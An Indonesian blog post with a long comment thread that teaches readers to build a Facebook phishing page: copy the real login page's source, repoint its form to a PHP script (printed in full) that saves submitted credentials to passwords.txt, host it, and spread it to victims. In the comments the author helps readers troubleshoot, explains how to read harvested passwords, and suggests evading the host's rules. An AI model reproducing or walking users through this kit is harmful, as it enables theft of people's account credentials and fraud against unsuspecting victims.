Home ยป Informasi ยป Hosting ยป Cara Membuat Web Phising

Cara Membuat Web Phising

Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code?tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad) ?di WINDOWS?atau gedit (Applications – ?Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code?(ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu
    <form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad :
    <?php header ('Location: http://fb.com ');
    $handle = fopen(passwords.txt, a);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, =);
    fwrite($handle, $value);
    fwrite($handle, rn);
    }
    fwrite($handle, rn);
    fclose($handle);
    exit;
    ?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.

Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. ๐Ÿ˜€

225 Comments

  1. sertipikat tanah

    September 7, 2010 at 6:04 pm

    bagus postinganya cobaah..
    fungsi dari pishing apa y ?

    Reply
    • KOKO

      July 17, 2020 at 9:25 pm

      NJIRRR 2010 KOMENAN YG GUA BACA

      Reply
  2. admin

    September 7, 2010 at 7:03 pm

    fungsi phising yaitu untuk memancing korban masuk dalam website bo’ongan buatan kamu. :hihi:
    Itukan tujuan membuat web phising. :bom:

    Reply
    • andre

      September 8, 2010 at 7:10 am

      makasi mas, keren nih infonya
      tujuannya bukannya buat ngambil pasword ama username ya? misal kalo di atas. nanti kita isa dapet password ama username FB.
      CMIIW

      Reply
      • admin

        September 8, 2010 at 8:33 am

        Itu terserah anda. Kalo korban sudah masuk ke web phising buatan anda tinggal apa yang tersedia di web phising anda. Jika di web phising tersebut meminta untuk memasukan user password, seperti membuat web phising facebook misalnya. :ngelamun:

        Reply
        • andre

          September 8, 2010 at 10:51 am

          link udah tak ganti bro :sliwer2:

          Reply
          • admin

            September 8, 2010 at 11:07 am

            Thanks BRo. . . :hehe:

          • Rafli Diansyah Putra

            December 19, 2016 at 4:05 pm

            mas kk punya saya eror yg file index html nya ..
            gimana solusinya ///

  3. Iqmal

    September 8, 2010 at 9:20 am

    Wadew.. Maenannya serem :hore:
    Tuh kursornya ganggu, di disable ajah. hhe

    Reply
    • admin

      September 8, 2010 at 10:42 am

      Saya masih nuwbiee gan :hehe:
      Ok gan sarannya saya terima. :sip:
      Ngomong2 themes yang di pake agan itu themes apa ya ?? hasil coding sendiri ?? :bisik:

      Reply
  4. aval

    September 12, 2010 at 1:08 am

    pengertian di no.8 gmna bro ???
    beri penjelasan lg donk.

    Reply
  5. aval

    September 12, 2010 at 1:22 am

    1. pengertian di no.8 dan 16 gmna bro ???
    2. gmna cara menjalan kn web phising ini
    mohon pencerahan nya ???

    Reply
    • Juz

      May 7, 2011 at 10:47 pm

      Susah Nie… Cara Cari Actionnya DMN .?

      Reply
      • Amri

        May 12, 2011 at 2:34 pm

        Action terserah agan aja.. ๐Ÿ˜€

        Reply
  6. Admin

    September 12, 2010 at 7:20 am

    1. Untuk no.8 kita Lihat no.7. Disana kita menemukan script menuju “url web asli” yang artinya setelah kita login akan di arahkan ke web asli tersebut. Namun untuk cara membuat web phising kita harus mengubah url yang menuju ke web asli ke web buatan kita, web tersebut saya beri nama “phising.php”.
    Untuk no.16 kita harus merubah permission di file password.txt karena file tersebut harus read and write artinya bsa memembaca dan menulis, membaca untuk kita melihat password yang sudah tersimpan di “password.txt”,namun apabila chmod/permission tidak di ganti menjadi 777 maka password korban tidak akan tersimpan.
    2. Untuk menjalankan anda tinggal buka saja alamat web phsing anda. Kemudian untuk mendapat user/email dan password itu terserah anda.
    Ma’af saya sedang menggunakan hp butut untuk membalas koment anda jadi agak sulit. Apabila masih ada kesulitan silahkan berkomentar. ๐Ÿ™‚

    Reply
    • king

      August 25, 2011 at 3:47 pm

      berarti kita harus buat web phising lagi dong ?

      Reply
      • Amri

        August 25, 2011 at 4:01 pm

        Emang kenapa harus buat webphising lagi ? sudah jadi kah ?
        Kita tinggal perbaiki yang salah saja dimana. Tidak perlu membuat lagi…

        Reply
  7. Searscard

    September 22, 2010 at 3:22 am

    Say thank you for have really fantastic informations. Your world-wide-web is greatI am impressed by the material that you have on this weblog. It exhibits how well you understand this topic. Bookmarked this method web page, will come back for far more. You, my buddy, awesome! I discovered just the specifics I already looked all over the place and just couldn?t discover. What a ideal website. Similar to this web site your web site is one of my new much-loved.I like this info shown and it has provided me some kind of idea to possess good results for some reason, so keep up the fantastic function!

    Reply
    • admin

      September 22, 2010 at 4:58 pm

      not really, I’m still in a learning phase. you said touched my heart, thank you ๐Ÿ™‚

      Reply
  8. ayie

    September 23, 2010 at 12:55 pm

    mas,klo web phising dalam message facebook itu gmna ?

    Reply
    • admin

      September 23, 2010 at 3:38 pm

      Maksudnya gmn neh ?? Buat web phising terus promosikan web phising yang udh anda buat mungkin. Maklum masih newbiee ๐Ÿ˜€

      Reply
      • ayie

        September 23, 2010 at 7:32 pm

        mksd saya gini,,
        ketika orang masukkan (cnth) username, paswot , itu larinya kemana biar kita bisa membuka nya (hack),web pising kita terhubung ke email or memang ada inbox spesial untuk username or paswot yg sudah diketikkan tsb,,
        mkmsii sblmnya.

        Reply
        • admin

          September 23, 2010 at 11:29 pm

          coba cek lagi postingan saya diatas. Tepatnya No.12, teliti scriptnya yang saya beri bolt ( teks tebal ). Baris No. 3 ada tulisan “passwords.txt”. itu dia, password akan tersimpan di file password.txt.
          Kalau mau buka tinggal ketik di address browser kamu sbb :
          http://namadomain.tld/password.txt. Bagaiman ? kurang jelas ? tanyakan lagi. dengan senang hati saya menjawab ๐Ÿ™‚

          Reply
  9. ayie

    September 24, 2010 at 5:46 pm

    oh,,
    iya,,iya,,,
    sya jg newbie ,jdinya harus banyak tanya biar agak mngrti,,
    nah,skrg gimana mengenai phising yg masuk k inbox facebook,dengan sediki kata-kat mereka menyuruh kita meng klik satu link yg klo dibuka itu berisi sebuah web phising, mksd saya mereka hebat membuat sebuah web, dapat dari mana ya mereka ??

    Reply
  10. ayie

    September 24, 2010 at 6:11 pm

    wah,,,
    saya sudah coba step by step, saya tdk mngrti, dan susah untuk mnegerti,
    apa lgi step nmr 15,,terlebih semuanya
    mohon di bimbing,,
    apa anda ada email ??

    Reply
  11. admin

    September 24, 2010 at 6:19 pm

    Kalu itu tergantu ke cerdasan kita untuk memancing korban dengan kata2 anda sendiri. Saya buat web phising ini hanya buat pembelajaran saja dan tidak untuk mencari korban. Jadi untuk tahap berikutnya bisa anda praktekan sendiri. Tapi ingat : RESIKO TANGGUNG PENUMPANG :))
    Mau coba ada neh di http://cekpulsa.co.tv

    Reply
  12. ayie

    September 24, 2010 at 6:32 pm

    cek pulsa itu streaming kan ?bagian mana nya yg merupakan phsing ??
    nah,skrg sy mnt pendapat anda,
    ada fb mainan saya yg inbox nya terdpat web phising,
    apa sama dgn tuts anda yg d atas,
    saya kasih disini id sama paswotnya or gmna ?

    Reply
    • admin

      September 24, 2010 at 6:50 pm

      OK,, password apa ?? boleh.

      Reply
  13. ical

    December 23, 2010 at 3:31 am

    MEMBUKA PERMISSION NY TU DR MANA GAN???
    TRUS,,FILE YG MANA LG HARUS KITA SIMPAN MENJADI ::PASSWORD.TXT::???
    WA MSH BINGUNG X NI MMBUAT NYA…..
    MAKLUUUMMM,,NEWBIE…..
    HEHEHEHE
    MOHON AJARAN NY Y GAN……

    Reply
  14. Amri

    December 23, 2010 at 6:55 pm

    kita tinggal buat file lewat text document / notepad / wordprad. Terus tinggal di upload lewat file manager di cpanel. permision ada di file manager di cpanel.

    Reply
  15. ICAL

    December 25, 2010 at 3:37 am

    ok dehh gan…
    thx a lot ya…..

    Reply
  16. jay

    February 16, 2011 at 5:00 pm

    thanks artikelnya masbro..ijin di test he..he..:)

    Reply
    • Amri

      February 16, 2011 at 5:05 pm

      Silahkan ๐Ÿ˜€

      Reply
  17. rizkqi

    April 24, 2011 at 6:59 am

    Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.php anda ).
    Ubah ?post? menjadi ?GET?.
    itu ane gk ngerti

    Reply
    • Amri

      April 24, 2011 at 10:36 am

      Kalo bingung ikutin saya aja, buat dengan nama “phising.php”.
      Nah diatas kan tertera <form action="URL WEB ASLI" method="post“>. Agan ganti post dengan GET.

      Reply
  18. rizkqi

    April 24, 2011 at 7:19 am

    Save dengan nama phising dan extensi .php jadinya phising.php
    Upload ke hostingan anda.
    Jangan lupa permission di atur 777 untuk file passwords.txt
    gan di savenya 2 kali ya yg pertama formatnya phising.txt terus yg keduax bebas misalnya qmail.php gitu ya, terus yg passwordnyadi ganti di mananya

    Reply
    • Amri

      April 24, 2011 at 10:37 am

      Bukan, ekstensi yang .txt diganti .php. Kalau phising.php ya phising.php saja.

      Reply
    • Amri

      April 24, 2011 at 1:17 pm

      Tulisan itu apa ? Kok not found ?

      Reply
  19. CokPekTol

    June 4, 2011 at 2:32 am

    Upload ke hosting caranya gimana yak ?

    Reply
    • Amri

      June 4, 2011 at 7:51 am

      Masuk aja dulu ke control panel hosting agan… cari menu file manager… nah disitu nanti ada menu lagi untuk upload file agan.. ๐Ÿ™‚

      Reply
      • CokPekTol

        June 4, 2011 at 8:08 pm

        kk ga ada menu file manager tuh ?
        Gimana donk -__-“

        Reply
        • Amri

          June 5, 2011 at 1:50 am

          pake cpanel atau apa? hosting dimana ?

          Reply
  20. zulqarnain

    June 4, 2011 at 10:01 pm

    dimana kita mengganti permission 777 ???
    engga ngerti ?????

    Reply
    • Amri

      June 5, 2011 at 1:50 am

      di chmod file managernya. setelah masuk cpanel langsung pilih file manager…

      Reply
  21. aditya

    June 17, 2011 at 11:52 am

    ga ad file managernya kk . . !!
    Gimana ??

    Reply
    • Amri

      June 17, 2011 at 6:06 pm

      Kalo gak ada file manager ya menu lainnya pokonya yang bisa untuk masuk diretory html nya atau yang untuk upload file2…

      Reply
  22. aditya

    June 18, 2011 at 10:13 am

    contoh nya ??

    Reply
  23. aditya

    June 18, 2011 at 10:52 am

    aq dah sampe step 14 , yg 15&16 aq ga tau !!
    jelasin lg donk . . .

    Reply
    • Amri

      June 18, 2011 at 8:37 pm

      Udah tau apa itu hosting ?
      Udah punya hosting ?
      Kalo belum punya silahkan daftar free hosting saja di google banyak. Lalu masuk cpanel dan cari file manager.

      Reply
  24. faroel

    June 19, 2011 at 11:42 am

    broo.., aq dah buat smua file na nie..,
    file.html
    file.php
    file.txt
    trus dah gwe apload ke freewebhostingarea.com.., kemudian gmana cara na kta bka wab na itu broo, chmod na jga dah gwe ganti dgn 777 slanjut na gimna lgi nie broo.., mohn bimbingn na ya ๐Ÿ˜‰

    Reply
    • Amri

      June 19, 2011 at 1:26 pm

      Tinggal akses saja nama domain yang kamu daftarkan di hosting itu… dah deh jadi.. ๐Ÿ˜€

      Reply
  25. MJ

    June 21, 2011 at 12:24 pm

    mas bro, ada ym ga ??
    biar enak nanya2nya, hehehehehe .
    thx jika tdk keberatan ๐Ÿ˜‰

    Reply
    • Amri

      June 21, 2011 at 5:37 pm

      Nanya apa bro ? Silahkan tanya aja disini. ๐Ÿ˜€
      Kalau mau ym ada di page/halaman about me.

      Reply
  26. aditya

    June 22, 2011 at 12:03 pm

    aq ga tw,, hosting itu ap ??

    Reply
    • Amri

      June 22, 2011 at 5:50 pm

      Hosting itu adalah tempat untuk menyimpan file yang kamu buat itu. Hosting bisa berbayar atau free… kamu bisa pilih sendiri….

      Reply
  27. aditya

    June 25, 2011 at 9:48 am

    Hosting aq 4Shared ,, bisa ?
    Bestu data yg 3 tu di Upload ya ??

    Reply
    • Amri

      June 25, 2011 at 4:48 pm

      Kalo 4shared itu file hosting mas,,, Bukan webhosting. Yang mas butuhkan itu webhosting karena mas akan membuat Web Phising. ๐Ÿ˜€

      Reply
  28. jibril

    July 5, 2011 at 9:37 am

    gan gimana nih aku masih binggung kok pas di buat udah bisa tapi pas di test log in error?? mohon bantuan nya

    Reply
    • Amri

      July 6, 2011 at 4:02 pm

      Errornya gimana ? Silahkan posting disini.

      Reply
  29. Hacker harajuku

    July 19, 2011 at 1:14 pm

    gan saya gk ngerti.. smua nya sudah jadi..dan sudah di upload ke 000webhost.com
    tapi saya binggung URL saya yg mana yah..
    dan gimana gw bisa tau web url phising punya saya..
    (newbie gan)

    Reply
    • Amri

      July 19, 2011 at 4:57 pm

      Nah itu domain/subdomain yang pertama kali anda masukan ketika mendaftar di 000webhost.

      Reply
  30. Loung Photos

    July 20, 2011 at 5:36 pm

    old script but still working, nice share dude ๐Ÿ™‚

    Reply
    • Amri

      July 20, 2011 at 5:56 pm

      Thanks You.

      Reply
  31. shurikenz

    July 21, 2011 at 12:29 am

    trus cara bikin link biar bs d kirim k org gmn prenz…?
    mohon bantuannya, thankz…

    Reply
    • Amri

      July 21, 2011 at 1:37 am

      Nah itu seh tergantu kreatifitas kamu aja. Ma’af saya tidak mengajarkan hack/merusak.
      Tutorial diatas cuma sebagai pengetahuan saja. ๐Ÿ˜€

      Reply
  32. Endi

    August 8, 2011 at 4:32 pm

    Caea uploadnya gimana?
    terus masukan permision code di mana?

    Reply
    • Amri

      August 8, 2011 at 6:06 pm

      Anda suah punya hosting ? Coba baca Cara Upload File di Free Hosting 000webhost.

      Reply
  33. rizzal

    August 14, 2011 at 1:58 pm

    no. 16 itu caranya gimana ya ?

    Reply
    • Amri

      August 14, 2011 at 2:01 pm

      Banyak komentar yang masih nyangkut di server lama gan sorry.
      – jawaban pertanyaan no. 16
      Setelah anda upload file – file yang sudah anda buat di hosting pasti anda akan menemukan option permission/chmod. Silahkan langsung anda praktikkan saja dan lihat di file manager.

      Reply
  34. ari

    August 24, 2011 at 5:23 am

    gimana caranya membuka almat web fhisingx?

    Reply
    • Amri

      August 24, 2011 at 12:43 pm

      Alamat web Phising ya alamat domain yang kamu buat….

      Reply
  35. angga

    August 25, 2011 at 10:01 pm

    yang jadi admin minta alamat fbnya dunk . . ane mau minta ilmunya dikit dan
    hehehe

    Reply
    • Amri

      August 26, 2011 at 1:17 am

      Cek aja di halaman “About Me” disana ada FB saya. Tapi saya bukan master. Saya juga lagi belajar.. ๐Ÿ˜€

      Reply
  36. rahmad

    September 7, 2011 at 3:08 pm

    gan gak ngerti aq gan pas aq upload kata dia not fround kayak mana nih gan

    Reply
    • Amri

      September 7, 2011 at 6:30 pm

      PAs di akses domainnya not found gitu ? yang jelas gan, sekalian kasih errornya atau SS-nya mungkin.

      Reply
  37. kristiana

    September 10, 2011 at 4:32 pm

    maksud dri upload k’hosting itu gmna,,??
    .sory w baru belajar ,maklumin ya..??
    hhe….

    Reply
    • Amri

      September 10, 2011 at 5:26 pm

      Sebaiknya kamu belajar domain dan hosting dulu.

      Reply
  38. dhanyong

    September 23, 2011 at 8:42 pm

    bang masa pas sudah saya tulis (action=) kaga ada yang keluar,,,yang ada hanya tanda hijau di tulisa ACTION= nya,,,
    apa ada kesalahan ya???
    tolong jelasiin bang !!

    Reply
    • Amri

      September 23, 2011 at 11:38 pm

      Tadi saya iseng nyari ketemu <form method=”POST” action=”https://www.facebook.com/login.php?login_attempt=1″ id=”login_form” onsubmit=”return Event.__inlineSubmit(this,event)”>
      Untuk bsa gaknya silahkan anda coba sendiri.

      Reply
  39. afit

    September 27, 2011 at 8:25 pm

    mantap gan……api nyong gak bisa nih,………sulit sekali sih….ajarin gan……

    Reply
    • Amri

      September 27, 2011 at 10:07 pm

      Itukan di atas sudah saya ajarin..

      Reply
  40. wincore

    September 28, 2011 at 12:19 pm

    Gan tnya,,taruh kata kita dah buat web phising kaya yg agan ajarin lha setelah itu gmana? apa otomatis seluruh user+pass akun facebook (misalnya) lari ke web hostingan kita? trims

    Reply
    • Amri

      October 7, 2011 at 9:41 pm

      yang login lewatweb phising agan akan kesimpen semua.

      Reply
  41. rada

    October 6, 2011 at 7:52 pm

    maaf bng saya mau tanya ada gk cara gampang dan praktis untuk memboboL mail to facebook dengan mudah.. kLu da bisa di jelasin mail saya.. X) makasih..

    Reply
    • Amri

      October 7, 2011 at 9:41 pm

      Wah, saya gak tau tuh gan.. ๐Ÿ˜€

      Reply
  42. Yua

    October 12, 2011 at 8:47 am

    Mas.,maksudnya URL web asli dganti dgn phising.php tu gmna ?
    dan gmna cara bkin hlaman php ?

    Reply
    • Amri

      October 12, 2011 at 3:21 pm

      Dibaca dulu sampai selesai. Pada poin berikutnya sudah di jelaskan cara membuat phising.php
      Cara membuat ekstensi php tinggal rename aja yang tadi nya file .txt menjadi .php

      Reply
  43. Yuan

    October 13, 2011 at 7:49 am

    Maksud dari
    – Jangan lupa permission di atur 777 untuk file passwords.txt
    apa ?

    Reply
    • Amri

      October 13, 2011 at 5:37 pm

      Mengijinkan agar passwords.txt dapat di eksekusi, dibaca dan di tulis oleh semua pihak…
      Klao passwords.txt gak diubah ke chmod 777 email dan password tidak akan tersimpan karena tidak memiliki hak akses.

      Reply
  44. Ali

    October 13, 2011 at 9:35 am

    sya mau tnya..saat upload di 000webhost.com itu yg di upload ada brp file ?

    Reply
    • Amri

      October 13, 2011 at 5:41 pm

      Sebenernya 000webhost.com tidak mengijinkan script seperti ini dipasang di server mereka tp kalau mau coba – coba dan gak ketahuan ya gak papa itung2 coba2.
      ada 3 file :
      Index.html
      phising.php
      passwords.txt

      Reply
  45. MReyhanAbizar

    October 19, 2011 at 4:39 pm

    Thanks gan saya dah coba dan berhasil.
    pertama tama saya coba pakai punya saya dulu
    dan ada di password.txt

    Reply
    • Amri

      October 19, 2011 at 5:47 pm

      Nah, ini dia hacker-nya… ๐Ÿ˜€

      Reply
  46. MReyhanAbizar

    October 19, 2011 at 4:44 pm

    ribet gan uploadnya 000webhost

    Reply
    • Amri

      October 19, 2011 at 5:50 pm

      ya itu cuma contoh saja. Kalau anda punya hosting Cpanel itu lebih mudah…

      Reply
  47. andre

    October 20, 2011 at 8:28 pm

    no 3 maksudnya gmna…

    Reply
    • Amri

      October 21, 2011 at 7:26 pm

      Setelah melakukan langkah ke-2 pasti paham untuk langkah ke-3. Kalo belum paham silahkan belajar apa itu source code.

      Reply
  48. david

    October 26, 2011 at 11:07 am

    sebelumnya terima kasih atas share ilmunya..saya dah buat sesuai petunjuk diatas, sudah mencoba untuk masuk web phising yang saya buat dan coba asal login, tp di password.txt tetap kosong(sudah diganti 777) dimanakah letak kesalahannya?apakah cara ini sudah tidak mempan, tolong penjelasannya.trims

    Reply
    • Amri

      October 26, 2011 at 2:45 pm

      Kurang tau gan udah lama gak mainan phising…. Tapi baca deh komentar di atas ada salah satu yang berhasil. Nanti kalo ada waktu luang boleh deh saya coba lagi cara diatas…
      Yang penting jangan lupa.

      Reply
  49. SaputraMZ

    October 29, 2011 at 4:40 pm

    Berkunjung balik kawand, mas kalo phising kan untuk halaman tipuan, tau cara bikin redirect ga’ mas, bantuin dunk, jadi kalau web diakses akan mengarah ke web yg lain gitu…?

    Reply
    • Amri

      October 29, 2011 at 7:40 pm

      Buat redirect apa dulu ??Coba search aja di blog saya dengan kata kunci redirect.

      Reply
  50. Registery

    October 30, 2011 at 8:15 pm

    website jebakan betmen :hah:
    link udh nongol

    Reply
    • Amri

      October 31, 2011 at 8:11 am

      Link juga udah kepasang ๐Ÿ˜€

      Reply
  51. inot

    November 3, 2011 at 1:36 pm

    kok aku coba cara sprti yang di atas gak bisa ya..? smp langkah ke tujuh..? pas masukin find text..? knp ya…?

    Reply
    • Amri

      December 4, 2011 at 9:33 am

      Gak bisanya gimana ?? gak bisa atau gak ketemu ?? ingat tanpa tanda petik.

      Reply
  52. TRINO SWANTO.M

    December 3, 2011 at 9:55 pm

    maaf aku kurang tau dengan statement yang diatas pa beloh diperjelas gak, aku sudah buka facebook dan menekan ctrl+u secara bersamaan tapi source code nya tidak ada?cara nya gimana ya tolong dikasih tau lagi ya?

    Reply
    • Amri

      December 4, 2011 at 9:32 am

      Gak mungkin kalo suatu halaman gak ada source Code nya…

      Reply
  53. Petrus

    December 7, 2011 at 7:57 am

    maaf a saya ingin bisa tapi tidak bisa melakukan langkah di atas, bukan kah kata si aa lebih baik bertanya dari pada sesat di jalan?kalau boleh kirim no HP si aa ke email saya,mungkin dengan cara mempraktekan lewat telfon saya bisa paham dan mengerti cara membuat web phishing tersebut. terimakasih sebelumnya……..

    Reply
    • Amri

      December 7, 2011 at 8:16 am

      Gak bisanya dimana ?? SIlahkan bertanya2 disini saja…

      Reply
      • petrus

        December 7, 2011 at 3:35 pm

        saya susah di pahami a lw tutorial nya lewat tulisan, mungkin lw tutorial lewat video/suara (telfon), mngkin sya bisa, sekalian jga kita lebih dekat dan menjalin tali persodaraan a.

        Reply
        • Amri

          December 7, 2011 at 4:08 pm

          Add ym ku aja @amrikarisma

          Reply
  54. irwinsyah hamid

    December 8, 2011 at 7:48 pm

    amri @ = gimana yah cara buat Cara Upload File di Free Hosting 000webhost.

    Reply
  55. petrus

    December 9, 2011 at 4:19 am

    [email protected] a di PC q loem ada aplikasi YM nya,ngobrol mslh membuat web phishing nya di FB z atuh lw gk bsa di sini mah,saya udh add ko kmrin2 ke FB si aa,v loem di knfrmsi.

    Reply
  56. Ahmad

    December 11, 2011 at 5:22 am

    cara lihat hasilnya dimana,??
    saya sudah selesai buat phisingnya

    Reply
    • Amri

      December 11, 2011 at 8:24 am

      Buatnya dimana ?? Silahkan buka domain yg anda gunakan untuk membuat webphising tersebut.

      Reply
  57. umar

    December 13, 2011 at 12:04 am

    cara menyelesaikan no 7 gimana caranya???
    apa maksud dari kata “ketemu”??

    Reply
    • Amri

      December 13, 2011 at 2:01 pm

      Pada tahap no.6 yaitu mencari action=
      maka pada no.7 ditemukan.

      Reply
  58. baron

    December 15, 2011 at 6:37 pm

    mas aq udh tahap upload….py udh aq upload..cara buat link ke php nya gmn..??

    Reply
    • Amri

      December 16, 2011 at 10:47 am

      Di buka lewat domainnya mas. ๐Ÿ˜€

      Reply
  59. Jefferly

    December 21, 2011 at 8:31 pm

    waw..
    mantap..
    saya coba dulu Gann.

    Reply
  60. tian

    January 7, 2012 at 8:56 am

    untuk file password.txt nya kurang jelas gan,,
    yang di bilang diatas cuma 2,,
    untuk password.txtnya gan???

    Reply
    • Amri

      January 8, 2012 at 1:06 am

      Cuma bikin file kosong dengan nama passwords.txt aja kok… dan permision set ke 777

      Reply
      • irwin

        August 10, 2013 at 12:15 am

        gan, maksudnya permission set ke 777 itu gimana?

        Reply
        • Amri

          August 14, 2013 at 12:25 am

          Itu di filenya di setting chmod nya ke 777 artinya supaya file tersebut bisa di tulis,dibaca dan dieksekusi oleh user,grup dan lainnya.

          Reply
  61. Zaelani

    January 11, 2012 at 2:48 pm

    gan dah gw add YMnya tolong konfrim yah biar aku bisa sharing ma bapak .. ๐Ÿ˜€

    Reply
    • Amri

      January 11, 2012 at 3:28 pm

      Jangan panggil bapak saya belum menikah.. ๐Ÿ˜ฏ
      oke gan TKP dulu… ๐Ÿ™‚

      Reply
  62. afif

    January 15, 2012 at 6:45 pm

    boz…file.nya cuma dua.ya yg di upload..?? index.html ma phising.php..???

    Reply
    • Amri

      January 15, 2012 at 7:34 pm

      Iya, terus nambah satu lagi bua file kosong dengan nama passwords.txt.
      kalo bingung buat sekalian di komputer terus tinggal upload, jadi 3 file kalo sama passwords.txt

      Reply
  63. afif

    January 15, 2012 at 6:52 pm

    cara nyebarin wep phising gmn.>???

    Reply
  64. afif

    January 15, 2012 at 6:55 pm

    boz…cara test webphising nya gmn..???
    ane kgak tau >????

    Reply
  65. agus

    February 2, 2012 at 11:32 am

    ke 777 mksud.y ..gmna
    ???

    Reply
  66. Addzifi

    February 4, 2012 at 9:37 pm

    yah..gan saya dah nyoba, but ada masalah pas upload file2 d atas kayaknya..biz dah selse smuanya

    Reply
  67. aguzt

    February 4, 2012 at 11:36 pm

    ga cara bikin phising facebook mobile gimana..??
    ane udah coba yang facebook versi desktop sukses tapi yang buat mobile belum bisa..

    Reply
  68. andrazee

    February 15, 2012 at 6:38 am

    belum working gan… mohon petuahnya,,, aku add ym nya gan.. ๐Ÿ˜€

    Reply
  69. ryan

    February 15, 2012 at 5:41 pm

    file yg di upload ada berapa.? yang mana aja
    1. index.html
    2. phising.php
    3. ?

    Reply
    • Amri

      February 16, 2012 at 4:36 am

      3.passwords.txt

      Reply
    • Fzcraft

      January 2, 2014 at 11:51 am

      salah kau belom beli domain

      Reply
  70. orexas

    May 1, 2012 at 8:02 pm

    tlong dong ajarin mas brow?

    Reply
  71. hendry heryana

    May 8, 2012 at 4:05 am

    Mau ikut lewat,, jual script website murah ada yang mau?

    Reply
  72. odilo febrian

    May 9, 2012 at 9:56 am

    di no. 16 tertulis “ke 3 file”
    tapi saya cuma menghasilkan 2 file ?

    Reply
    • Amri

      May 9, 2012 at 9:52 pm

      Kurang passwords.txt

      Reply
  73. vindra88

    May 19, 2012 at 1:56 am

    yang sudah pernah belajar basic html pasti paham dengan langkah2 di atas… ๐Ÿ™‚
    cuman sayang, saya masih belum begitu paham tentang upload ke web hosting.
    tutorialnya apakah ada, mas bro??

    Reply
  74. Thementor

    June 17, 2012 at 12:24 pm

    udah selesai kk,
    phising buatan bocah smp..
    ;D

    Reply
  75. reza

    June 18, 2012 at 5:09 pm

    gan aku bingung yang nomor 15

    Reply
  76. Fahri

    July 20, 2012 at 9:18 am

    sya sudah slesai semua tpi kok pas buka hostingnya masih iklan blum hlaman kYa facebook.?

    Reply
    • Fzcraft

      January 2, 2014 at 11:55 am

      B’rarti Ada yg salah

      Reply
  77. rahmat

    July 23, 2012 at 2:10 am

    saya sudah selesai meng-upload ke hosting,tp kok setelah di buka linknya gk berhasil hanya ada bacaan index of/,,,,,letak kesalahannya di mana ya mas?apakah emng karna memakai hosting gratisan ya????tolong di ksh tau solusinya,,,,,

    Reply
    • Amri

      July 23, 2012 at 11:10 am

      Apakah sudah benar lokasi root dokumen nya saat mengupload ? dibawah index of/ ada file2 yang anda upload tidak ?

      Reply
      • rahmat

        August 12, 2012 at 1:48 am

        ada tp file itu sm dgn file yg da dlm publik_html yg aq upload sblumnya,,tp stlh di klik mlh file trsebut menuju tmpt download,,,,

        Reply
        • Amri

          August 12, 2012 at 2:07 am

          file yang di upload sudah ada index.html atau index.php nya belum ?

          Reply
  78. putra bahari

    August 20, 2012 at 1:49 pm

    gan ane masih belum ngerti gan……
    yang pas peng upload.annye
    tolong bantuannya gan….ane pengen bisa
    mas amri , ni no ane
    08571831xxxx
    thx

    Reply
    • Amri

      August 22, 2012 at 7:36 pm

      Kalo cara mengupload belum bisa silahkan cari-cari tutorial untuk cara upload file ke hosting terlebih dahulu. Dan maaf saya tidak melayani telp/sms, ada pertanyaan diblog silahkan tanyakan via komentar, ym/email, atau skype saja..

      Reply
  79. ichwan

    March 16, 2013 at 2:45 pm

    cara ganti permision nya gmana min..?? bingung nih password nya ga muncul

    Reply
  80. epy

    August 22, 2013 at 10:38 am

    mas gan mo tanya ne, ntar klo liat pwnya lewat “PPP” yg ada dmna? di comp ato di uploadtan hosting sendiri? mkasih

    Reply
    • Amri

      August 22, 2013 at 12:41 pm

      Liatnya di hostingnya. tinggal akses aja domain.com/passwords.txt kalo tempat nyimpen passwordnya di passwords.txt.

      Reply
      • epy

        August 23, 2013 at 6:57 am

